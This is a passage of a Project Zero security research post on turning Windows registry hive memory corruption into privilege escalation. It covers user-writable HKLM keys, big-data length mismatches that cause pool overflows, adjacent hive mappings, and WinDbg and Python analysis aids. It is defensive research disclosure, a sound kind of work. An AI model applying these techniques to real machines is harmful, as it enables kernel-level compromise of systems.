Posted by Mateusz Jurczyk, Google Project Zero

In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail.



Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations, such as buffer overflows, and temporal violations, such as use-after-free conditions.

In this write-up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I previously covered this topic at OffensiveCon 2024 in a talk titled “Practical Exploitation of Registry Vulnerabilities in the Windows Kernel”, and this blog post can be considered a supplement to and an expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.

Where to start: high-level overview of potential options

Let’s start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any “hive spraying” or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don’t know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn’t pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation.

The exploitation of classic memory corruption bugs typically involves the following steps:

- Initial memory corruption primitive

- ???

- ???

- ???

- Profit (in the form of arbitrary code execution, privilege escalation, etc.)

The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance:

In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation:

Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.

Intra-hive corruption

Let’s start by investigating whether overwriting internal hive data is as impractical as it might initially seem.

Performing hive-only attacks in privileged system hives

To be clear, it’s not completely accurate to say that hives don’t contain any data worth overwriting. If you think about it, it’s quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met:

- The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don’t have that over any system hive.

- The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug.

Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated “offline”, starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, fewer than half (8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., they require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the “Operating on subkeys of transactionally renamed keys” section of the report) and CVE-2023-23423 (discussed in “Freeing a shallow copy of a key node with CmpFreeKeyByCell”).

Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this:

- To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.

- The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.

- There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation.

To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should ultimately be able to obtain a list of potential keys that can be used to corrupt a system hive.
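The "read the security descriptor and check it manually" variant can be illustrated with a small model. The sketch below is not the real AccessCheck algorithm: it is a simplified, per-right walk over a DACL that ignores generic-right mapping, inheritance flags, owner rights, and integrity labels. The `Ace` type, the dictionary input format, and the `HKLM\SOFTWARE\Example\...` paths are hypothetical and exist only for illustration. Real tooling would obtain descriptors with RegGetKeySecurity and evaluate them with AccessCheck, as described above.

```python
from dataclasses import dataclass

KEY_SET_VALUE = 0x0002       # value from winnt.h
KEY_CREATE_SUB_KEY = 0x0004  # value from winnt.h

# Well-known SIDs typically present in an ordinary interactive user's token.
UNPRIVILEGED_SIDS = frozenset({
    "S-1-1-0",       # Everyone
    "S-1-5-4",       # Interactive
    "S-1-5-11",      # Authenticated Users
    "S-1-5-32-545",  # Users
})


@dataclass(frozen=True)
class Ace:
    """Hypothetical, simplified access control entry."""
    allow: bool  # True = access-allowed ACE, False = access-denied ACE
    sid: str
    mask: int


def granted_mask(dacl, token_sids, desired):
    """Walk ACEs in order and return the subset of `desired` that is granted."""
    granted = 0
    denied = 0
    for ace in dacl:
        if ace.sid not in token_sids:
            continue
        if ace.allow:
            granted |= ace.mask & desired & ~denied
        else:
            denied |= ace.mask & desired & ~granted
    return granted


def writable_keys(keys, token_sids=UNPRIVILEGED_SIDS):
    """Map each key path to the write rights a regular user would get.

    `keys` maps a key path to its DACL (a list of Ace objects). Keys that
    grant neither KEY_SET_VALUE nor KEY_CREATE_SUB_KEY are omitted.
    """
    wanted = KEY_SET_VALUE | KEY_CREATE_SUB_KEY
    result = {}
    for path, dacl in keys.items():
        mask = granted_mask(dacl, token_sids, wanted)
        if mask:
            result[path] = mask
    return result
```

Because the check looks only at the key's own descriptor, a permissive key is reported as writable regardless of how restrictive its ancestors are, which mirrors the kernel behavior described earlier.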

Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include:

    HKLM\SOFTWARE\Microsoft\CoreShell
    HKLM\SOFTWARE\Microsoft\DRM
    HKLM\SOFTWARE\Microsoft\Input\Locales (and some of its subkeys)
    HKLM\SOFTWARE\Microsoft\Input\Settings (and some of its subkeys)
    HKLM\SOFTWARE\Microsoft\Shell\Oobe
    HKLM\SOFTWARE\Microsoft\Shell\Session
    HKLM\SOFTWARE\Microsoft\Tracing (and some of its subkeys)
    HKLM\SOFTWARE\Microsoft\Windows\UpdateApi
    HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX
    HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM
    HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing
    HKLM\SYSTEM\Software\Microsoft\TIP (and some of its subkeys)
    HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation
    HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
    HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval
    HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings

As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind.

Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user’s hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn’t been fixed so far. This decision is somewhat understandable, as the behavior doesn’t have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to:

- Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.

- Write not just to the “TypingInsights” key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user’s permissions.

- Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario.

As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security.

In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.

Abusing regf inconsistency to trigger kernel pool corruption

While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive’s data maintains consistency with its own structure and associated auxiliary structures.

For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.

However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long “big data” value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count – 1), then the next time the value’s data is requested, a linear pool buffer overflow will occur.
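The overflow condition can be checked with a few lines of arithmetic. This is a minimal sketch of the mismatch described above, not a reconstruction of CmpGetValueData: it assumes only that the buffer is sized from `DataLength` and that at least `Count - 1` full chunks of 16344 bytes are copied. How the final chunk is handled is deliberately left out of the model, and the function name is hypothetical.

```python
BIG_DATA_CHUNK = 16344  # usable bytes per big-data chunk, as stated in the text


def big_data_overflow(data_length, chunk_count):
    """Return a lower bound on the bytes written past the pool buffer.

    data_length models _CM_KEY_VALUE.DataLength (buffer size),
    chunk_count models _CM_BIG_DATA.Count (drives the copy).
    A result of 0 means this simplified model predicts no overflow.
    """
    copied_at_least = BIG_DATA_CHUNK * (chunk_count - 1)
    return max(0, copied_at_least - data_length)


if __name__ == "__main__":
    # A 3-chunk value whose DataLength was corrupted down to 0x100 bytes.
    print(hex(big_data_overflow(0x100, 3)))
```

In this model, the attacker controls both the size of the undersized allocation (through `DataLength`) and the amount of overflowing data (through `Count`), which is what makes the primitive attractive for pool grooming.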

This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won’t explore this further here, and instead encourage interested readers to investigate it on their own.

Inter-hive memory corruption

So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin’s mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the “Registry” process, and one where it resides in the kernel address space.

Other hive mappings in the user space of the Registry process

Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below.

    0: kd> !process 0 0
    **** NT ACTIVE PROCESS DUMP ****
    PROCESS ffffa58fa069f040
        SessionId: none  Cid: 0004  Peb: 00000000  ParentCid: 0000
        DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.
        Image: System

    PROCESS ffffa58fa074a080
        SessionId: none  Cid: 007c  Peb: 00000000  ParentCid: 0004
        DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount: <Data Not Accessible>
        Image: Registry
    […]
    0: kd> .process ffffa58fa074a080
    Implicit process is now ffffa58f`a074a080
    WARNING: .cache forcedecodeuser is not enabled
    0: kd> !vad
    VAD              Level  Start     End       Commit
    ffffa58fa207f740  5     152e7a20  152e7a2f  0 Mapped  READONLY  \Windows\System32\config\SAM
    ffffa58fa207dbc0  4     152e7a30  152e7b2f  0 Mapped  READONLY  \Windows\System32\config\DEFAULT
    ffffa58fa207dc60  5     152e7b30  152e7b3f  0 Mapped  READONLY  \Windows\System32\config\SECURITY
    ffffa58fa207d940  3     152e7b40  152e7d3f  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa207dda0  5     152e7d40  152e7f3f  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    […]
    ffffa58fa207e840  5     152ec940  152ecb3f  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa207b780  3     152ecb40  152ecd3f  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa0f98ba0  5     152ecd40  152ecd4f  0 Mapped  READONLY  \EFI\Microsoft\Boot\BCD
    ffffa58fa3af5440  4     152ecd50  152ecd8f  0 Mapped  READONLY  \Windows\ServiceProfiles\NetworkService\NTUSER.DAT
    ffffa58fa3bfe9c0  5     152ecd90  152ecdcf  0 Mapped  READONLY  \Windows\ServiceProfiles\LocalService\NTUSER.DAT
    ffffa58fa3ca3d20  1     152ecdd0  152ece4f  0 Mapped  READONLY  \Windows\System32\config\BBI
    ffffa58fa2102790  6     152ece50  152ecf4f  0 Mapped  READONLY  \Users\user\NTUSER.DAT
    ffffa58fa4145640  5     152ecf50  152ed14f  0 Mapped  READONLY  \Windows\System32\config\DRIVERS
    ffffa58fa4145460  6     152ed150  152ed34f  0 Mapped  READONLY  \Windows\System32\config\DRIVERS
    ffffa58fa412a520  4     152ed350  152ed44f  0 Mapped  READONLY  \Windows\System32\config\DRIVERS
    ffffa58fa412c5a0  6     152ed450  152ed64f  0 Mapped  READONLY  \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
    ffffa58fa4e8bf60  5     152ed650  152ed84f  0 Mapped  READONLY  \Windows\appcompat\Programs\Amcache.hve

In the listing above, the “Start” and “End” columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them.
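The conversion from the "Start" and "End" page numbers to byte addresses is simple enough to script when processing many VAD entries. The following sketch uses the SAM and DEFAULT entries from the listing; the helper names are hypothetical.

```python
PAGE_SIZE = 0x1000  # 4 KiB


def vad_byte_range(start_vpn, end_vpn):
    """Convert !vad Start/End page numbers into an inclusive byte range."""
    first = start_vpn * PAGE_SIZE
    last = end_vpn * PAGE_SIZE + PAGE_SIZE - 1
    return first, last


def are_adjacent(vad_a, vad_b):
    """True when mapping b begins on the page right after mapping a ends."""
    return vad_a[1] + 1 == vad_b[0]


# (Start, End) pairs copied from the listing.
SAM = (0x152e7a20, 0x152e7a2f)
DEFAULT = (0x152e7a30, 0x152e7b2f)

if __name__ == "__main__":
    for name, vad in (("SAM", SAM), ("DEFAULT", DEFAULT)):
        first, last = vad_byte_range(*vad)
        print(f"{name}: {first:#x} - {last:#x}")
    print("adjacent:", are_adjacent(SAM, DEFAULT))
```

Running the adjacency check over consecutive entries is a quick way to confirm that the mappings are packed without gaps.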

However, this example does not directly demonstrate whether it’s possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn’t much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process’s memory.

For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter “A” and the latter with the letter “B”. The result of the test was immediately visible in the memory layout:
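The size arithmetic behind the choice of 0x3FD8 can be written out explicitly. This is a sketch under two assumptions: the value data lands in a freshly allocated bin of its own (no existing free cell is large enough), and the data is small enough to be stored directly rather than as big data. The function names are hypothetical.

```python
HBIN_HEADER_SIZE = 0x20  # sizeof(_HBIN)
CELL_SIZE_FIELD = 4      # 32-bit size prefix stored at the start of every cell
CELL_ALIGNMENT = 8       # cell sizes are rounded up to 8 bytes
BIN_ALIGNMENT = 0x1000   # bin sizes are multiples of 4 KiB


def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def cell_size(data_length):
    """Total cell size for a payload of data_length bytes."""
    return align_up(CELL_SIZE_FIELD + data_length, CELL_ALIGNMENT)


def new_bin_size(data_length):
    """Size of a fresh bin that holds one cell with data_length bytes."""
    return align_up(HBIN_HEADER_SIZE + cell_size(data_length), BIN_ALIGNMENT)


if __name__ == "__main__":
    print(hex(cell_size(0x3FD8)), hex(new_bin_size(0x3FD8)))
```

With 0x3FD8 bytes of data, the cell rounds up to 0x3FE0 bytes (the 4 bytes of padding), and together with the header the bin fills exactly four pages with no leftover free cell.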

    0: kd> !vad
    VAD              Level  Start     End       Commit
    ffffa58fa67b44c0  8     15280000  152801ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b5b40  7     15280200  152803ff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b46a0  8     15280400  152805ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b6540  6     15280600  152807ff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b5dc0  8     15280800  152809ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b4560  7     15280a00  15280bff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b6900  8     15280c00  15280dff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b5280  5     15280e00  15280fff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b5e60  8     15281000  152811ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b7800  7     15281200  152813ff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b8de0  8     15281400  152815ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    ffffa58fa67b8840  6     15281600  152817ff  0 Mapped  READONLY  \Users\user\Desktop\test.dat
    ffffa58fa67b8980  8     15281800  152819ff  0 Mapped  READONLY  \Windows\System32\config\SOFTWARE
    […]

What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length (512 pages of 4 KiB) and tightly packed with 128 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result:

    0: kd> db 0x15280400000-30
    00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA....
    00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@......
    00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB
    00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
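To make the dump easier to read, the bytes at the start of the SOFTWARE mapping can be decoded as a bin header followed by the first cell. The sketch below parses only the first three _HBIN fields (signature, file offset, size) and the 32-bit cell size at offset 0x20; the remaining header fields are skipped, and the function name is hypothetical.

```python
import struct

# The 0x30 bytes starting at 0x15280400000, copied from the dump above.
RAW = bytes.fromhex(
    "6862696e00f0bf0c0040000000000000"
    "00000000000000000000000000000000"
    "20c0ffff424242424242424242424242"
)


def parse_bin_start(buf):
    """Decode the leading _HBIN fields and the size of the first cell."""
    signature, file_offset, bin_size = struct.unpack_from("<4sII", buf, 0)
    (first_cell_size,) = struct.unpack_from("<i", buf, 0x20)
    return {
        "signature": signature,
        "file_offset": file_offset,
        "bin_size": bin_size,
        # A negative size marks an allocated cell; its magnitude is the length.
        "first_cell_allocated": first_cell_size < 0,
        "first_cell_length": abs(first_cell_size),
    }


if __name__ == "__main__":
    for key, value in parse_bin_start(RAW).items():
        print(key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

The decoded values line up with the test setup: a 0x4000-byte bin whose single allocated cell of 0x3FE0 bytes holds the 0x3FD8 bytes of "B" data.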

We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other.

After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one’s own code with administrator privileges.

Attacking adjacent memory in pool-based hive mappings

Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows:

- All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.

- The entire HKLM\SYSTEM hive, including both its stable and volatile parts.

- All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.

- Volatile storage space of every active hive in the system.

The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn’t require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below:

This behavior can be further verified on a specific example. Let’s consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the “HKCU\Volatile Environment” key. Let’s first find the hive in WinDbg using the !reg hivelist command:

    0: kd> !reg hivelist
    ----------------------------------------------------------------------------------------------------------------------------
    |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|   Volatile Map   |    BaseBlock     | FileName
    ----------------------------------------------------------------------------------------------------------------------------
    […]
    | ffff82828fc1a000 |       ee000 | ffff82828fc1a128 |          5000 | ffff82828fc1a3a0 | ffff82828f8cf000 | \??\C:\Users\user\ntuser.dat
    […]

As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let’s try to find the second page of this hive region in memory by translating its corresponding cell index:

    0: kd> !reg cellindex ffff82828fc1a000 80001000

    Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0
    MapTable     = ffff82828fe6a000
    MapEntry     = ffff82828fe6a018
    BinAddress = ffff82828f096009, BlockOffset = 0000000000000000
    BlockAddress = ffff82828f096000

    pcell:  ffff82828f096004
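The fields printed by the debugger follow directly from the bit layout of a cell index: a 1-bit storage type, a 10-bit directory index, a 9-bit table index, and a 12-bit offset. The sketch below reproduces the decoding for the index 0x80001000 and recomputes the final cell address from the map entry values shown in the output. The function names are hypothetical, and the dictionary keys follow the debugger's labels.

```python
def decode_cell_index(index):
    """Split a 32-bit cell index into the fields shown by !reg cellindex."""
    return {
        "type": index >> 31,             # 0 = stable, 1 = volatile storage
        "table": (index >> 21) & 0x3FF,  # slot in the directory
        "block": (index >> 12) & 0x1FF,  # slot in the table (one per 4 KiB)
        "offset": index & 0xFFF,         # byte offset within the block
    }


def cell_address(bin_address, block_offset, index):
    """Compute the address of the cell data from a map entry.

    The low 4 bits of the bin address are masked off, and the final +4
    skips the 32-bit cell size that precedes the cell data.
    """
    return (bin_address & ~0xF) + block_offset + (index & 0xFFF) + 4


if __name__ == "__main__":
    print(decode_cell_index(0x80001000))
    print(hex(cell_address(0xFFFF82828F096009, 0, 0x80001000)))
```

The computed address matches the `pcell` value reported by the debugger, which confirms that the translation consists of nothing more than table lookups and additions.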

It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data:

    0: kd> db ffff82828f096000
    ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............
    ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ...
    ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................
    ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................
    ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?.......
    ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59
    ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?...

Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor (‘sk’). Now, let’s see what the !pool command tells us about this address:

    0: kd> !pool ffff82828f096000
    Pool page ffff82828f096000 region is Paged pool
    *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes
            Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm

We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it?

